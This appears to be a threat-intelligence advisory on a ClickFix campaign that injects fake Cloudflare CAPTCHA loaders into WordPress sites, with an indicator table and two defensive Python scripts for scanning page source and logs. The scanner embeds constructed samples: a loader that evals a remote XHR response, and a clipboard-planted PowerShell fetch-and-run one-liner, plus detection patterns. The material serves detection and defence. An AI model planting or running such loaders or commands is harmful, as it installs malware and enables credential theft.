Pulse: ClickFix-as-a-Service platform delivering a fake Cloudflare CAPTCHA through compromised WordPress sites via a DOM overlay
Author: dispensight | TLP: WHITE | Created: 2026-05-20 | Modified: 2026-05-20
105 IOCs (high volume)
TLP:GREEN | SL-ADV-2026-WP-001 UNIFIED | Reporting window: March 20 – May 19, 2026

ClickFix/TDS cluster active since March 2026. Compromised WordPress sites inject an obfuscated JS loader that fires a synchronous XHR to a TDS C2 (ntdnewtds.shop / dnsnewtds.shop / sdntds.shop), fetches a remote payload, and executes it inline.

Victims see a fake Cloudflare CAPTCHA (rendered in a Shadow DOM, localized into 50 languages) that silently writes a PowerShell command to the clipboard.

PowerShell chain: IRM (Invoke-RestMethod) stage 1 → IWR (Invoke-WebRequest) stage 2 → csc.exe compiles a Rozena DLL → injection into svchost → DonutLoader C2 (158.94.208.104) → browser/Firefox/crypto-wallet credential theft → self-delete. A parallel Python chain (Protected.py) uses direct NT syscalls for EDR bypass.

Per-campaign C2 IPs, segmented DonutLoader payloads (my_ / student_ prefixes), and a 6-domain TDS pool suggest a ClickFix-as-a-Service affiliate platform. 4 JS variants documented March–May 2026.

SecureLeaf · Dispensight Security Research · SL-ADV-2026-WP-001 rev. 3.0 · STIX 2.1 · 438 objects · 4 variants · 2 execution chains
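The loader behaviour described above (synchronous XHR to a /jsrepo or /teamrepo TDS endpoint, inline execution of the response, then a Shadow DOM overlay that writes PowerShell to the clipboard) can be hunted for statically in WordPress page and theme source. The scanner below is an added example for this advisory, not SecureLeaf/Dispensight code: the TDS domains come from the indicator table, but the rule weights, the threshold and the three sample sources (which are constructed to mirror the description, not the real obfuscated loader) are assumptions for the demonstration.

```python
"""Static scan of WordPress page/theme source for the injected ClickFix loader pattern.

Added example for this advisory; not SecureLeaf/Dispensight code. Sample sources
are constructed to mirror the described behaviour. Weights/threshold are assumptions.
"""
import re
from dataclasses import dataclass, field

# TDS / landing domains taken from the indicator table of this pulse.
TDS_DOMAINS = {
    "ntdnewtds.shop", "dnsnewtds.shop", "sdntds.shop", "dntds.shop",
    "newtdsone.shop", "cptoptious.com", "captioto.com",
}

# (name, weight, pattern). Each rule maps to one step of the described chain.
RULES = [
    # XMLHttpRequest.open(..., false): the synchronous fetch that blocks page load
    ("sync_xhr", 3, re.compile(r"\.open\(\s*['\"](?:GET|POST)['\"][^;]*?,\s*false\s*\)", re.I)),
    # /jsrepo?rnd= and /teamrepo are the TDS endpoints listed in the table
    ("tds_path", 3, re.compile(r"/(?:jsrepo|teamrepo)\b", re.I)),
    # eval()/Function() of the XHR body: inline execution of the remote payload
    ("inline_exec", 3, re.compile(r"(?:\beval|new\s+Function)\s*\(\s*[\w.]*responseText", re.I)),
    # Second stage: fake CAPTCHA in a Shadow DOM that writes PowerShell to the clipboard
    ("shadow_dom", 1, re.compile(r"\.attachShadow\s*\(", re.I)),
    ("clipboard_write", 3, re.compile(r"clipboard\.writeText\s*\(|execCommand\s*\(\s*['\"]copy['\"]", re.I)),
    ("powershell_string", 3, re.compile(r"powershell(?:\.exe)?\s|\birm\s+http|\biwr\s+http", re.I)),
]
HOST_RE = re.compile(r"(?:https?:)?//([a-z0-9.-]+\.[a-z]{2,})", re.I)
THRESHOLD = 6  # assumed: one chain step plus a TDS domain, or two strong steps, flags the file


@dataclass
class Finding:
    score: int = 0
    hits: list = field(default_factory=list)
    domains: list = field(default_factory=list)


def scan_source(src: str) -> Finding:
    """Score one HTML/JS blob. Run it over beautified/deobfuscated output: the
    advisory calls the loader obfuscated, so literal patterns can be string-split."""
    f = Finding()
    for name, weight, rx in RULES:
        if rx.search(src):
            f.hits.append(name)
            f.score += weight
    for host in sorted({m.group(1).lower() for m in HOST_RE.finditer(src)}):
        if any(host == d or host.endswith("." + d) for d in TDS_DOMAINS):
            f.domains.append(host)
            f.score += 5
    return f


def is_suspicious(src: str) -> bool:
    return scan_source(src).score >= THRESHOLD


# Constructed loader mirroring the described first stage (not the real sample).
LOADER_SAMPLE = """
<script>
var u='https://ntdnewtds.shop/jsrepo?rnd='+Math.random();
var x=new XMLHttpRequest();x.open('GET',u,false);x.send(null);
if(x.status==200){eval(x.responseText);}
</script>
"""
# Constructed second stage: Shadow DOM overlay that loads a PowerShell one-liner into the clipboard.
CAPTCHA_SAMPLE = """
var h=document.createElement('div');var r=h.attachShadow({mode:'closed'});
r.innerHTML='<div>Verify you are human</div>';document.body.appendChild(h);
navigator.clipboard.writeText('powershell -w hidden -c "irm http://example.invalid/s1 | iex"');
"""
# Constructed benign snippet: an ordinary async call to the site's own REST API.
BENIGN_SAMPLE = """
<script>fetch('/wp-json/wp/v2/posts?per_page=5').then(r=>r.json()).then(render);</script>
"""

if __name__ == "__main__":
    for label, src in (("loader", LOADER_SAMPLE), ("captcha", CAPTCHA_SAMPLE), ("benign", BENIGN_SAMPLE)):
        print(label, scan_source(src))
```

Feed it the rendered front page, the active theme's header/footer/functions.php, and script-bearing wp_options and post rows, which are the usual places such injections land (general practice, not a finding of this advisory). Two things to keep in mind: a hit on a TDS domain alone is already worth an incident, whereas the Shadow DOM and clipboard rules fire on legitimate web components too, which is why they only add up to a finding together with a PowerShell string; and an obfuscated loader that builds its URL from fragments will only trip the sync_xhr and inline_exec rules, so treat those two together as sufficient to pull the file for manual review.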
Indicators of Compromise (105)
TYPE INDICATOR DESCRIPTION CREATED
CIDR 178.16.53.0/24 2026-05-20
FileHash-MD5 09d8e272484c2bef81590887460981ff 2026-05-20
FileHash-MD5 25e90438c448898c2b8fa0814ccbd0c8 2026-05-20
FileHash-MD5 4f67ea9205c3ca7c9e04582d3b9bdd1d MD5 of 4b77eae349a8cbcea7133cf3640a64ebf1f69d54d8f6469d7be6fdc188ca4ca4 2026-05-20
FileHash-MD5 51b46342163ef37f5f41c269ffb337d3 MD5 of 724a8445c5c3fd57778d82f62b9d4a6112a3bb2d 2026-05-20
FileHash-MD5 7c268bfab0653cdca45b4dc3c1ee0092 MD5 of f1542a7697e04865e1dfeeed084e5ea5870100f0 2026-05-20
FileHash-MD5 c43c4bfd2e1a44ef690e6801be2b4099 2026-05-20
FileHash-MD5 c67211d946c6762bbef2afdb74c63416 2026-05-20
FileHash-MD5 f29926ae72794dde60ae1d57d97c5781 2026-05-20
FileHash-MD5 ff1d1a915f7a4a1df4a16e0dd2990241 2026-05-20
FileHash-SHA1 1389676a4641ef8e3b4790cf06063249d411a692 2026-05-20
FileHash-SHA1 39676ea0b0640b4db29d0f93845d702b3784985a 2026-05-20
FileHash-SHA1 724a8445c5c3fd57778d82f62b9d4a6112a3bb2d 2026-05-20
FileHash-SHA1 750146d79df2f7e02b6895527d982b4de952ab94 2026-05-20
FileHash-SHA1 85590cac2455a48ef1231a27dca94294de292b96 2026-05-20
FileHash-SHA1 abc92bc7fcb91e4122ebe93c4ea0d35b0e5bbce5 2026-05-20
FileHash-SHA1 ca03486f14ec38cd5ed6377fe6f56c1a5713a44a 2026-05-20
FileHash-SHA1 d3b68ad3eb88d3db3d843211d4905143c3bff281 SHA1 of 4b77eae349a8cbcea7133cf3640a64ebf1f69d54d8f6469d7be6fdc188ca4ca4 2026-05-20
FileHash-SHA1 dcfb29698a73656e60a329274ecc5833f92517ad 2026-05-20
FileHash-SHA1 e221c94adb02cc387bcbf9265c1769f36c59cce5 2026-05-20
FileHash-SHA1 f1542a7697e04865e1dfeeed084e5ea5870100f0 2026-05-20
FileHash-SHA1 f7836ce43c5f137fdd793d37c0ad3c17ab4ec9f0 2026-05-20
FileHash-SHA256 1d9d37f90fa60b93647a845ff39f64ff7e7f71f6f2a576780fbe974064a907b1 2026-05-20
FileHash-SHA256 2198767147bdf67a45da63ad9a35900b4ca8e628fedca13873ae50cf5805c810 SHA256 of 724a8445c5c3fd57778d82f62b9d4a6112a3bb2d 2026-05-20
FileHash-SHA256 2f515997ab1c7f5ab94a46041ad2af06031a842469b65bcbd2c64bd47f12a896 2026-05-20
FileHash-SHA256 339e0e018b48a118c36c0b7181b143c255ebad19c5f628a1a57903592f07df94 2026-05-20
FileHash-SHA256 4a3b036f9447151b8ca04dbdce96bf98edf8a8a8a5638c4fc1dc3b237eb30be5 2026-05-20
FileHash-SHA256 4b77eae349a8cbcea7133cf3640a64ebf1f69d54d8f6469d7be6fdc188ca4ca4 2026-05-20
FileHash-SHA256 6d0f2cd8b853c64182986d2dcaefe5df9fe9b53220774f99dcfd9f09add3540d 2026-05-20
FileHash-SHA256 88c9a328be9d2f04b3b93d2d95117f3ab3c5403fd0f9c69f8002e74e8edfd3a9 SHA256 of f1542a7697e04865e1dfeeed084e5ea5870100f0 2026-05-20
FileHash-SHA256 b04f539c7bbb9133d2f801bfce73ec84ad3cc33768685ca415113f622db90168 2026-05-20
FileHash-SHA256 b726e153e883e0bc6fba82c4ac6811d7e924b981778c122f34a57edd613b1937 2026-05-20
FileHash-SHA256 ddc31ec7dbb142352e2b91847aac451f7891e107a2d0075a13b96a02cd043cff 2026-05-20
IPv4 158.94.208.104 CC=GB ASN=AS786 jisc services limited 2026-05-20
IPv4 158.94.208.92 CC=GB ASN=AS786 jisc services limited 2026-05-20
IPv4 178.16.52.232 CC=DE ASN=AS40999 dus.net gmbh 2026-05-20
IPv4 91.92.240.117 CC=BG ASN=AS34368 zonata - natskovi & sie ltd. 2026-05-20
IPv4 91.92.240.121 CC=BG ASN=AS34368 zonata - natskovi & sie ltd. 2026-05-20
URL http://158.94.208.104/x7GkP2mQ9zL4/ 2026-05-20
URL http://158.94.208.104/x7GkP2mQ9zL4/my_downloader.bin 2026-05-20
URL http://158.94.208.104/x7GkP2mQ9zL4/my_l.bin 2026-05-20
URL http://158.94.208.104/x7GkP2mQ9zL4/my_s.bin 2026-05-20
URL http://158.94.208.104/x7GkP2mQ9zL4/student_downloader.bin 2026-05-20
URL http://158.94.208.104/x7GkP2mQ9zL4/student_l.bin 2026-05-20
URL http://158.94.208.104/x7GkP2mQ9zL4/student_s.bin 2026-05-20
URL http://158.94.208.104:80 2026-05-20
URL http://158.94.208.92 2026-05-20
URL http://91.92.240.117/ 2026-05-20
URL http://91.92.240.117/121 2026-05-20
URL http://91.92.240.121 2026-05-20
URL http://91.92.240.121/ 2026-05-20
URL http://captioto.com/cptoptious.com/newtdsone.shop 2026-05-20
URL http://cptoptious.com/captcha.htm 2026-05-20
URL http://cptoptious.com/captcha.html 2026-05-20
URL http://cptoptious.com/jsrepo 2026-05-20
URL http://dnsnewtds.shop/jsrepo 2026-05-20
URL http://ntdnewtds.shop/jsrepo 2026-05-20
URL http://ntdnewtds.shop/jsrepo?rnd= 2026-05-20
URL http://sdntds.shop/teamrepo 2026-05-20
URL http://www.captioto.com/ 2026-05-20
URL http://www.cptoptious.com/ 2026-05-20
URL http://www.dnsnewtds.shop/ 2026-05-20
URL http://www.kamisisterbrofanydodf.com/ 2026-05-20
URL http://www.newtdsone.shop/ 2026-05-20
URL https://captioto.com/jsrepo 2026-05-20
URL https://cptoptious.com/automail-insurtech-tax.de 2026-05-20
URL https://cptoptious.com/jsrepo 2026-05-20
URL https://cptoptious.com/teamrepo 2026-05-20
URL https://cptoptious.com/url= 2026-05-20
URL https://dnsnewtds.shop/... 2026-05-20
URL https://gettrumpmemes.gettrumpmemestrendingtokens.com/ 2026-05-20
URL https://gettrumpmemes.gettrumpmemestrendingtokens.com/images/* 2026-05-20
URL https://gettrumpmemes.gettrumpmemestrendingtokens.com/images/1389676a4641ef8e3b4790cf06063249d411a692.svg 2026-05-20
URL https://gettrumpmemes.gettrumpmemestrendingtokens.com/images/39676ea0b0640b4db29d0f93845d702b3784985a.svg 2026-05-20
URL https://gettrumpmemes.gettrumpmemestrendingtokens.com/images/750146d79df2f7e02b6895527d982b4de952ab94.svg 2026-05-20
URL https://gettrumpmemes.gettrumpmemestrendingtokens.com/images/ca03486f14ec38cd5ed6377fe6f56c1a5713a44a.svg 2026-05-20
URL https://ntdnewtds.shop/jsrepo 2026-05-20
URL https://ntdnewtds.shop/jsrepo/ 2026-05-20
URL https://sdntds.shop/teamrepo?rnd=0.3905751823084034&ts=1779127243826 2026-05-20
URL https://sdntds.shop/teamrepo?rnd=0.5058000373016334 2026-05-20
URL https://www.captioto.com/ 2026-05-20
URL https://www.cptoptious.com/ 2026-05-20
URL https://www.dnsnewtds.shop/ 2026-05-20
URL https://www.kamisisterbrofanydodf.com/ 2026-05-20
URL https://www.newtdsone.shop/ 2026-05-20
domain captioto.com 2026-05-20
domain caravan-crm-lu.com 2026-05-20
domain cptoptious.com 2026-05-20
domain dnsnewtds.shop 2026-05-20
domain kamisisterbrofanydodf.com 2026-05-20
domain newtdsone.shop 2026-05-20
domain ntdnewtds.shop 2026-05-20
domain obfuscator.io 2026-05-20
domain sdntds.shop 2026-05-20
hostname blksssd.ydns.eu 2026-05-20
hostname gettrumpmemes.gettrumpmemestrendingtokens.com 2026-05-20
hostname www.captioto.com 2026-05-20
hostname www.cptoptious.com 2026-05-20
hostname www.dnsnewtds.shop 2026-05-20
hostname www.kamisisterbrofanydodf.com 2026-05-20
hostname www.newtdsone.shop 2026-05-20
domain gettrumpmemestrendingtokens.com hard-coded fallback / spare domain 2026-05-20
domain dntds.shop Routed via prefix 178.16.53.0/24 (AS202412; partial trace, 1 hop). Loader URL pattern: dntds.shop/jsrepo?rnd=<random> 2026-05-20
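The table above is only useful once its rows are turned into lookups that handle the cases a flat string match misses: IPs that fall inside the listed /24, www.-prefixed queries that should match a bare domain, and URL indicators whose host is itself an IP. The script below is an added example for this pulse, not SecureLeaf/Dispensight or OTX code: PULSE_ROWS is a subset of the table (descriptions dropped except one, to show the parser ignores them), the `']` residue that trails many URL rows on this page is stripped during parsing, and LOG_LINES are constructed resolver and proxy records for the demonstration.

```python
"""Match this pulse's network indicators against proxy and DNS log lines.

Added example for this pulse, not SecureLeaf/Dispensight or OTX code. PULSE_ROWS is a
subset of the indicator table above; LOG_LINES are constructed for the demonstration.
"""
import ipaddress
import re
from urllib.parse import urlsplit

PULSE_ROWS = """\
CIDR 178.16.53.0/24 2026-05-20
IPv4 158.94.208.104 CC=GB ASN=AS786 jisc services limited 2026-05-20
IPv4 91.92.240.117 2026-05-20
URL http://158.94.208.104/x7GkP2mQ9zL4/my_downloader.bin'] 2026-05-20
URL https://sdntds.shop/teamrepo?rnd=0.5058000373016334'] 2026-05-20
domain cptoptious.com 2026-05-20
domain dntds.shop 2026-05-20
hostname blksssd.ydns.eu 2026-05-20
FileHash-SHA256 4b77eae349a8cbcea7133cf3640a64ebf1f69d54d8f6469d7be6fdc188ca4ca4 2026-05-20
"""

# Constructed log lines: a resolver log format and a forward-proxy log format.
LOG_LINES = [
    "2026-05-18T09:12:01Z dns client=10.0.4.21 qname=www.cptoptious.com qtype=A",
    "2026-05-18T09:12:02Z proxy client=10.0.4.21 dst=178.16.53.77 url=http://dntds.shop/jsrepo?rnd=0.41",
    "2026-05-18T09:14:40Z proxy client=10.0.4.21 dst=158.94.208.104 url=http://158.94.208.104/x7GkP2mQ9zL4/my_downloader.bin",
    "2026-05-18T09:15:00Z dns client=10.0.7.9 qname=example.org qtype=A",
]

RESIDUE = "']"  # extraction debris trailing many URL rows on the page


def parse_rows(text):
    """Build lookup sets from 'TYPE INDICATOR [DESCRIPTION] CREATED' rows."""
    ioc = {"domains": set(), "hosts": set(), "ips": set(), "nets": [], "urls": set(), "hashes": set()}
    for line in text.splitlines():
        parts = line.split()
        if len(parts) < 3:
            continue
        kind, value = parts[0], parts[1].rstrip(RESIDUE)
        if kind == "CIDR":
            ioc["nets"].append(ipaddress.ip_network(value, strict=False))
        elif kind == "IPv4":
            ioc["ips"].add(value)
        elif kind == "URL":
            ioc["urls"].add(value)
            host = urlsplit(value).hostname or ""
            try:  # a URL whose host is a literal IP also feeds the IP lookup
                ioc["ips"].add(str(ipaddress.ip_address(host)))
            except ValueError:
                if host:
                    ioc["hosts"].add(host.lower())
        elif kind == "domain":
            ioc["domains"].add(value.lower())
        elif kind == "hostname":
            ioc["hosts"].add(value.lower())
        elif kind.startswith("FileHash-"):
            ioc["hashes"].add(value.lower())
    return ioc


IP_RE = re.compile(r"\b(?:\d{1,3}\.){3}\d{1,3}\b")
HOST_RE = re.compile(r"(?:qname|host|sni)=([\w.-]+)", re.I)
URL_RE = re.compile(r"url=(\S+)", re.I)


def host_hit(host, ioc):
    """Exact hostname match, or parent-domain match (www.cptoptious.com -> cptoptious.com).
    The leading dot keeps sdntds.shop from matching the separate dntds.shop entry."""
    host = host.lower().rstrip(".")
    if host in ioc["hosts"]:
        return host
    for d in ioc["domains"]:
        if host == d or host.endswith("." + d):
            return d
    return None


def ip_hit(ip, ioc):
    """Exact IP match, or containment in a listed CIDR."""
    if ip in ioc["ips"]:
        return ip
    try:
        addr = ipaddress.ip_address(ip)
    except ValueError:
        return None
    for net in ioc["nets"]:
        if addr in net:
            return str(net)
    return None


def match_line(line, ioc):
    hits = set()
    for ip in IP_RE.findall(line):
        h = ip_hit(ip, ioc)
        if h:
            hits.add(h)
    hosts = HOST_RE.findall(line)
    for url in URL_RE.findall(line):
        h = urlsplit(url).hostname
        if h:
            hosts.append(h)
    for host in hosts:
        h = host_hit(host, ioc)
        if h:
            hits.add(h)
    return sorted(hits)


def match_logs(lines, ioc):
    """Return [(line_index, [matched indicators])] for lines with at least one hit."""
    out = []
    for i, line in enumerate(lines):
        hits = match_line(line, ioc)
        if hits:
            out.append((i, hits))
    return out


if __name__ == "__main__":
    for i, hits in match_logs(LOG_LINES, parse_rows(PULSE_ROWS)):
        print(i, hits, LOG_LINES[i])
```

Before loading the whole table this way, prune it: obfuscator.io is the public JavaScript obfuscator service and is listed here because the loader was built with it, so matching it in egress logs produces noise rather than a detection; and the 158.94.208.x hosts sit in AS786 (Jisc, the UK research and education network), so block the listed /32s, not the prefix. The `my_`/`student_` payload names under 158.94.208.104/x7GkP2mQ9zL4/ are worth a separate URL-path rule, since the same loader path is described as per-campaign.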